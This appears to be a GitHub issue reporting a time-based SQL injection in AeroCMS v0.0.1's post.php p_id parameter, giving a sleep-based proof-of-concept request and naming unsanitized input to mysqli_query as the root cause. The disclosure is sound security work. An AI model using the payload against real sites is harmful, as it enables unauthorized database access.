You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on May 8, 2023. It is now read-only.
I was drawn to this source code after reading a quick write-up, by [nu11secur1ty] earlier today about the "author parameter from the AeroCMS-v0.0.1" being vuln to SQLi.
It seems there is more.. PoC
1] GET /post.php?p_id=
Response normal [7ms]
HTTP/1.1 200 OK
Date: Tue, 30 Aug 2022 16:00:08 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6100
Connection: close
Content-Type: text/html; charset=UTF-8
I was drawn to this source code after reading a quick write-up, by [nu11secur1ty] earlier today about the "
author
parameter from the AeroCMS-v0.0.1" being vuln to SQLi.It seems there is more.. PoC
1] GET /post.php?p_id=
HTTP/1.1 200 OK
Date: Tue, 30 Aug 2022 16:00:08 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6100
Connection: close
Content-Type: text/html; charset=UTF-8
2] **GET /post.php?p_id=(select*from(select(sleep(20)))a) **
Delayed response. A clear indication of SQLi Vuln
3] Checking through the source code we can see the problem.
See post.php lines 94-106
Root cause? Unsanitized input into mysqli_query
There are more vulnerabilities within this source, I'm happy to disclose, just contact me. please ensure proper sanitization of all input.
The text was updated successfully, but these errors were encountered: